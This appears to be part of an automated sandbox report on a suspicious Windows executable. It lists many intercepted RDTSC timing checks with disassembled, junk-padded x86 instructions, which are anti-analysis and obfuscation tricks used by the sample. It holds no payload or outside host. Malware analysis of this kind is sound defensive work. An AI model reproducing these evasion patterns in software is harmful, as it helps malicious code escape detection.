                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1145D3C second address: 1145D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1145D44 second address: 1145D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xor dword ptr [esp], 35505400h 0x0000000d mov di, si 0x00000010 push 00000003h 0x00000012 sbb esi, 4A130D52h 0x00000018 push 00000000h 0x0000001a mov edx, dword ptr [ebp+122D3719h] 0x00000020 mov edx, dword ptr [ebp+122D34D9h] 0x00000026 push 00000003h 0x00000028 mov dword ptr [ebp+122D3135h], eax 0x0000002e call 00007F65CC527C99h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1145D82 second address: 1145D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1145D87 second address: 1145DA5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F65CC527C96h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F65CC527C9Bh 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11673E7 second address: 11673EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11673EB second address: 11673EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11673EF second address: 11673FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F65CD2EDEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11651AD second address: 11651BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165321 second address: 1165339 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65CD2EDEEFh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165489 second address: 11654AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F65CC527C9Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11654AC second address: 11654C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65CD2EDEF0h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11654C9 second address: 11654D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165615 second address: 1165628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jng 00007F65CD2EDEECh 0x0000000d jg 00007F65CD2EDEE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165628 second address: 116562E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116562E second address: 116564A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11657FE second address: 1165808 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165808 second address: 1165837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEF4h 0x00000009 jmp 00007F65CD2EDEF7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165837 second address: 116583B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165DB6 second address: 1165DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CD2EDEECh 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1165DC7 second address: 1165DCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1166D72 second address: 1166D78 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116973D second address: 1169741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1169741 second address: 1169769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F65CD2EDEEAh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F65CD2EDEECh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 112C0EF second address: 112C100 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65CC527C98h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 112C100 second address: 112C13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65CD2EDEE6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F65CD2EDEF5h 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F65CD2EDEF5h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 112C13F second address: 112C149 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F188 second address: 116F18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F64D second address: 116F67B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527CA5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65CC527CA2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F67B second address: 116F688 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F7FC second address: 116F806 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F65CC527C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F806 second address: 116F82E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push ebx 0x0000000e jc 00007F65CD2EDEE6h 0x00000014 pop ebx 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F65CD2EDEEEh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F82E second address: 116F842 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65CC527C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F93B second address: 116F93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 116F93F second address: 116F95D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F65CC527C9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 jnl 00007F65CC527C96h 0x00000017 pop edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1173B56 second address: 1173B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1173D03 second address: 1173D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jg 00007F65CC527C96h 0x0000000b jmp 00007F65CC527C9Eh 0x00000010 jp 00007F65CC527C96h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b jne 00007F65CC527C96h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1173D2D second address: 1173D75 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F65CD2EDEF6h 0x00000010 jmp 00007F65CD2EDEECh 0x00000015 jne 00007F65CD2EDEE6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e jc 00007F65CD2EDEF2h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 jmp 00007F65CD2EDEEAh 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117405B second address: 1174063 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1174063 second address: 1174069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1174069 second address: 117406D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1174351 second address: 1174387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F65CD2EDEEEh 0x0000000b pop edx 0x0000000c je 00007F65CD2EDF25h 0x00000012 jl 00007F65CD2EDEF8h 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F65CD2EDEF0h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175A07 second address: 1175A14 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175D0E second address: 1175D14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175D99 second address: 1175D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175D9F second address: 1175DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175E88 second address: 1175E8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1175E8E second address: 1175E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117637F second address: 1176383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11766FB second address: 1176701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1176701 second address: 1176707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1176931 second address: 117693B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65CD2EDEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117693B second address: 1176945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F65CC527C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11779ED second address: 11779F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11779F3 second address: 11779FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F65CC527C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11789E4 second address: 11789E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1179581 second address: 1179586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1179263 second address: 1179268 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1179268 second address: 1179288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F65CC527CA6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1179288 second address: 11792A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEF7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117C122 second address: 117C197 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F65CC527C9Eh 0x0000000e push 00000000h 0x00000010 adc esi, 6DB4148Fh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F65CC527C98h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 or dword ptr [ebp+122D2391h], ebx 0x00000038 jne 00007F65CC527C9Ch 0x0000003e jo 00007F65CC527C9Ch 0x00000044 add esi, dword ptr [ebp+122D35C9h] 0x0000004a xchg eax, ebx 0x0000004b push eax 0x0000004c push edx 0x0000004d ja 00007F65CC527CA7h 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117C197 second address: 117C1A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 117C909 second address: 117C90E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118069F second address: 11806A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118175F second address: 11817FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F65CC527C98h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jg 00007F65CC527C9Ch 0x0000002c push dword ptr fs:[00000000h] 0x00000033 and di, B026h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov eax, dword ptr [ebp+122D1195h] 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F65CC527C98h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 0000001Ch 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f mov edi, dword ptr [ebp+122D324Ah] 0x00000065 push FFFFFFFFh 0x00000067 mov ebx, eax 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e jne 00007F65CC527C96h 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11827FE second address: 1182804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1183713 second address: 1183717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 113B1DE second address: 113B1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEFh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F65CD2EDEE6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11817FB second address: 1181805 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65CC527C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1183717 second address: 118371B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118371B second address: 1183721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1183721 second address: 1183727 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 118783E second address: 1187849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186A92 second address: 1186A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1187849 second address: 11878B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65CC527C9Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jng 00007F65CC527C96h 0x00000013 popad 0x00000014 popad 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F65CC527C98h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 mov ebx, edx 0x00000035 pop edi 0x00000036 ja 00007F65CC527C9Ch 0x0000003c push 00000000h 0x0000003e add bl, FFFFFF91h 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 pushad 0x00000044 jmp 00007F65CC527C9Dh 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186A96 second address: 1186AA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F65CD2EDEE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11878B5 second address: 11878BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186AA5 second address: 1186B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 stc 0x00000008 push dword ptr fs:[00000000h] 0x0000000f stc 0x00000010 mov dword ptr fs:[00000000h], esp 0x00000017 sub dword ptr [ebp+122D198Dh], ecx 0x0000001d mov di, 7B5Ah 0x00000021 mov eax, dword ptr [ebp+122D0A39h] 0x00000027 push 00000000h 0x00000029 push esi 0x0000002a call 00007F65CD2EDEE8h 0x0000002f pop esi 0x00000030 mov dword ptr [esp+04h], esi 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc esi 0x0000003d push esi 0x0000003e ret 0x0000003f pop esi 0x00000040 ret 0x00000041 movzx edi, si 0x00000044 sub dword ptr [ebp+122D2EFDh], ebx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007F65CD2EDEE8h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 sub edi, dword ptr [ebp+122D196Bh] 0x0000006c mov dword ptr [ebp+122D2B99h], edi 0x00000072 mov bh, EEh 0x00000074 nop 0x00000075 pushad 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11878BE second address: 11878D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186B26 second address: 1186B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1186B2A second address: 1186B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
